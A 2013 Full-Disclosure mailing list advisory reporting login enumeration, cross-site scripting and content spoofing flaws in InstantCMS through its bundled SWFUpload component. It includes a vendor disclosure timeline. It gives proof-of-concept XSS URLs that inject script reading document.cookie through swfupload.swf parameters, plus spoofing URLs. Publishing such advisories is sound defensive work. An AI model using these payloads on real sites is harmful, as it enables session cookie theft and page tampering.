'[Full-disclosure] Multiple vulnerabilities in InstantCMS'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Multiple vulnerabilities in InstantCMS
From:       "MustLive" <mustlive () websecurity ! com ! ua>
Date:       2013-09-25 18:13:45
Message-ID: 006d01ceba1b$090f6410$9b7a6fd5 () pc
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


Hello 3APA3A!


These are Login Enumeration, Cross-Site Scripting and Content Spoofing vulnerabilities in \
InstantCMS.

-------------------------
Affected products:
-------------------------

Vulnerable are InstantCMS 1.10.2 and previous versions.

-------------------------
Affected vendors:
-------------------------

InstantSoft
http://www.instantcms.ru

----------
Details:
----------

Login Enumeration (WASC-42):

http://site/users/login

It's possible to reveal logins by users' profiles. And also logins of the users are shown in \
many sections of the site (at users page and others), because developers don't care about \
leakage of logins of the users. In the next advisory about InstantCMS I'll give more example of \
such vulnerabilities.

Cross-Site Scripting (WASC-08):

http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//


http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E


Content Spoofing (WASC-12):

http://site/includes/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E


http://site/includes/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif


------------
Timeline:
------------ 

In November 2012 and March 2013 I disclosed and wrote to the lists about vulnerabilities in \
SWFUpload. All who want fixed these holes, but not developers of InstantCMS.

2013.07.14 - found multiple vulnerabilities in InstantCMS 1.10.1.
2013.07.19 - informed developers about first part of the vulnerabilities. Ignored.
2013.07.30 - announced at my site.
2013.07.31 - informed developers about another part of the vulnerabilities. Answered, but \
refused to fix. 2013.08.02 - reminded developers about first letter with holes and explained \
why to fix them. 2013.08.02 - developers released InstantCMS 1.10.2 without fixing any informed \
vulnerabilities. All above-mentioned holes work in it. 2013.09.24 - disclosed at my site \
(http://websecurity.com.ua/6681/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


[Attachment #5 (text/html)]

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1251">
<META content="MSHTML 6.00.2900.2180" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><STRONG>Hello&nbsp;3APA3A!</STRONG><BR></DIV>
<DIV>&nbsp;</DIV>
<DIV>These are Login Enumeration, Cross-Site Scripting and Content Spoofing 
vulnerabilities&nbsp;in InstantCMS.</DIV>
<DIV>&nbsp;</DIV>
<DIV>-------------------------<BR>Affected 
products:<BR>-------------------------</DIV>
<DIV>&nbsp;</DIV>
<DIV>
<DIV>
<DIV>Vulnerable are&nbsp;InstantCMS 1.10.2&nbsp;and previous 
versions.</DIV></DIV>
<DIV>&nbsp;</DIV>
<DIV>
<DIV>
<DIV>-------------------------</DIV>
<DIV>Affected vendors:<BR>-------------------------</DIV></DIV>
<DIV>&nbsp;</DIV>
<DIV>InstantSoft</DIV>
<DIV><A href="http://www.instantcms.ru">http://www.instantcms.ru</A></DIV>
<DIV>&nbsp;</DIV></DIV>
<DIV>
<DIV>----------</DIV></DIV>
<DIV>
<DIV>Details:<BR>----------</DIV>
<DIV>
<DIV>&nbsp;</DIV>
<DIV><STRONG>Login Enumeration (WASC-42):</STRONG></DIV>
<DIV>&nbsp;</DIV>
<DIV><A href="http://site/users/login">http://site/users/login</A></DIV>
<DIV>&nbsp;</DIV>
<DIV>It's possible to reveal logins by users' profiles. And also logins of the 
users are shown in many sections of the site (at users page and others), because 
developers don't care about leakage of logins of the users. In the next advisory 
about InstantCMS I'll give more example of such vulnerabilities.</DIV>
<DIV>&nbsp;</DIV>
<DIV><STRONG>Cross-Site Scripting (WASC-08):</STRONG></DIV>
<DIV>&nbsp;</DIV>
<DIV><A 
href="http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a= \
!alert(document.cookie);//">http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//</A></DIV>
 <DIV><BR><A 
href="http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(do \
cument.cookie)%27%3EClick%20me%3C/a%3E">http://site/includes/swfupload/swfupload.swf?buttonText= \
%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E</A></DIV> \
<DIV>&nbsp;</DIV> <DIV><STRONG>Content Spoofing (WASC-12):</STRONG></DIV>
<DIV>&nbsp;</DIV>
<DIV><A 
href="http://site/includes/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.sw \
fupload.org/v220/images/logo.gif%27%3E">http://site/includes/swfupload/swfupload.swf?buttonText= \
test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E</A></DIV> <DIV><BR><A 
href="http://site/includes/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220 \
/images/logo.gif">http://site/includes/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif</A></DIV>
 <DIV><A href="http://websecurity.com.ua"></A>&nbsp;</DIV></DIV>
<DIV>
<DIV>
<DIV>------------<BR>Timeline:<BR>------------ </DIV>
<DIV>
<DIV>&nbsp;</DIV>
<DIV>In&nbsp;November 2012 and March 2013 I disclosed and wrote to the lists 
about vulnerabilities in SWFUpload. All who want fixed these holes, but not 
developers of&nbsp;InstantCMS.</DIV>
<DIV>&nbsp;</DIV>
<DIV>2013.07.14 - found multiple vulnerabilities in InstantCMS 1.10.1.</DIV>
<DIV>2013.07.19 - informed developers about first part of the vulnerabilities. 
Ignored.</DIV>
<DIV>
<DIV>2013.07.30 - announced at my site.</DIV>2013.07.31 - informed developers 
about another part of the vulnerabilities. Answered, but refused to fix.</DIV>
<DIV>2013.08.02 - reminded developers about first letter with holes and 
explained why to fix them.</DIV>
<DIV>2013.08.02 - developers released InstantCMS 1.10.2 without fixing any 
informed vulnerabilities. All above-mentioned holes&nbsp;work in it.</DIV>
<DIV>2013.09.24 - disclosed at my site (<A 
href="http://websecurity.com.ua/6681/">http://websecurity.com.ua/6681/</A>).</DIV>
<DIV>&nbsp;</DIV></DIV></DIV></DIV>
<DIV>Best wishes &amp; regards,<BR>MustLive<BR>Administrator of Websecurity web 
site<BR><A 
href="http://websecurity.com.ua">http://websecurity.com.ua</A></DIV></DIV></DIV></BODY></HTML>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic